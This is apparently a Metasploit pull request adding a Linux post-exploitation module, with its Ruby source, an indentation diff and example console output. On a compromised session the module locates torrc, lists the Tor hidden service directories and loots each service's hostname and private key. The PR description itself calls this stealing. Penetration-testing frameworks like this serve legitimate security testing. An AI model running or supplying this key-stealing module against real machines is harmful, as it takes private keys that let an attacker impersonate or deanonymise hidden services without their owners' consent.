### PR TITLE
Linux post module to search for and grab TOR hidden service configurations

### DIFF
--- a/modules/post/linux/gather/tor_hiddenservices.rb
+++ b/modules/post/linux/gather/tor_hiddenservices.rb
@@ -15,11 +15,11 @@ class MetasploitModule < Msf::Post
       'Name'          => 'Linux Gather TOR Hidden Services',
       'Description'   => %q{
         This module collects the hostnames name and private keys of
-	any TOR Hidden Services running on the target machine. It
-	will search for torrc and if found, will parse it for the
-	directories of Hidden Services. However, root permissions
-	are required to read them as they are owned by the user that
-	TOR runs as, usually a separate account.
+        any TOR Hidden Services running on the target machine. It
+        will search for torrc and if found, will parse it for the
+        directories of Hidden Services. However, root permissions
+        are required to read them as they are owned by the user that
+        TOR runs as, usually a separate account.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -62,25 +62,25 @@ class MetasploitModule < Msf::Post
   def find_torrc
     config = cmd_exec("find / -name 'torrc' 2>/dev/null | head -n 1").chomp
     if config != ""
-    	print_good("Torrc file found at #{config}")
-	hiddenservices = cmd_exec("cat #{config} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
-	print_good("Hidden Services found!")
+        print_good("Torrc file found at #{config}")
+        hiddenservices = cmd_exec("cat #{config} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
+        print_good("Hidden Services found!")
 
-	if is_root?
-		hiddenservices.each do |f|
-			output = read_file("#{f}hostname")
-			save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/
-		end
+        if is_root?
+            hiddenservices.each do |f|
+                output = read_file("#{f}hostname")
+                save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/
+        end
 
-		hiddenservices.each do |f|
-			output = read_file("#{f}private_key")
-			save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/
-		end
-	else
-		print_error("Hidden Services were found, but we need root to access the directories")
-	end
+            hiddenservices.each do |f|
+                output = read_file("#{f}private_key")
+                save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/
+        end
+        else
+            print_error("Hidden Services were found, but we need root to access the directories")
+        end
     else
-	print_error("No Torrc file found. Perhaps it goes by another name?")
+        print_error("No Torrc file found. Perhaps it goes by another name?")
     end
   end
 end

--- a/modules/post/linux/gather/tor_hiddenservices.rb
+++ b/modules/post/linux/gather/tor_hiddenservices.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+# Adapted from post/linux/gather/enum_configs.rb
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Priv
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Linux Gather TOR Hidden Services',
+      'Description'   => %q{
+        This module collects the hostnames name and private keys of
+	any TOR Hidden Services running on the target machine. It
+	will search for torrc and if found, will parse it for the
+	directories of Hidden Services. However, root permissions
+	are required to read them as they are owned by the user that
+	TOR runs as, usually a separate account.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Harvey Phillips <xcellerator[at]gmx.com>',
+        ],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
+    ))
+  end
+
+  def run
+    distro = get_sysinfo
+    h = get_host
+    print_status("Running module against #{h}")
+    print_status("Info:")
+    print_status("\t#{distro[:version]}")
+    print_status("\t#{distro[:kernel]}")
+    print_status("Looking for torrc...")
+    find_torrc
+  end
+
+  def save(file, data, ltype, ctype="text/plain")
+    fname = ::File.basename(file)
+    loot = store_loot(ltype, ctype, session, data, fname)
+    print_status("#{fname} stored in #{loot.to_s}")
+  end
+
+  def get_host
+    case session.type
+    when /meterpreter/
+      host = sysinfo["Computer"]
+    when /shell/
+      host = cmd_exec("hostname").chomp
+    end
+
+    return host
+  end
+
+  def find_torrc
+    config = cmd_exec("find / -name 'torrc' 2>/dev/null | head -n 1").chomp
+    if config != ""
+    	print_good("Torrc file found at #{config}")
+	hiddenservices = cmd_exec("cat #{config} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
+	print_good("Hidden Services found!")
+
+	if is_root?
+		hiddenservices.each do |f|
+			output = read_file("#{f}hostname")
+			save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/
+		end
+
+		hiddenservices.each do |f|
+			output = read_file("#{f}private_key")
+			save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/
+		end
+	else
+		print_error("Hidden Services were found, but we need root to access the directories")
+	end
+    else
+	print_error("No Torrc file found. Perhaps it goes by another name?")
+    end
+  end
+end


### PR DESCRIPTION
Steals hostnames and private keys of TOR hidden services originating from the target machine.

Tested against Debian GNU/Linux 8 running kernel version 3.16.0-4-amd64 from Arch Linux kernel version 4.11.3-1-ARCH
## What it does
* Searches for the TOR configuration file "torrc" (typically /etc/tor/torrc, but could change).
* Parses the found file for lines starting with "HiddenServiceDir" and grabs the locations of the hidden services on the system (again, typically /var/lib/tor/... on most distros by default).
* Finally loots the files "hostname" and "private_key" found in each of these folders.
## Example Output for root session
```
msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 1
SESSION => 1
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.hostn_479046.txt
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.priva_933706.txt
[*] Post module execution completed
```
## Example Output for non-root session
```
msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 2
SESSION => 2
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[-] Hidden Services were found, but we need root to access the directories
[*] Post module execution completed
```
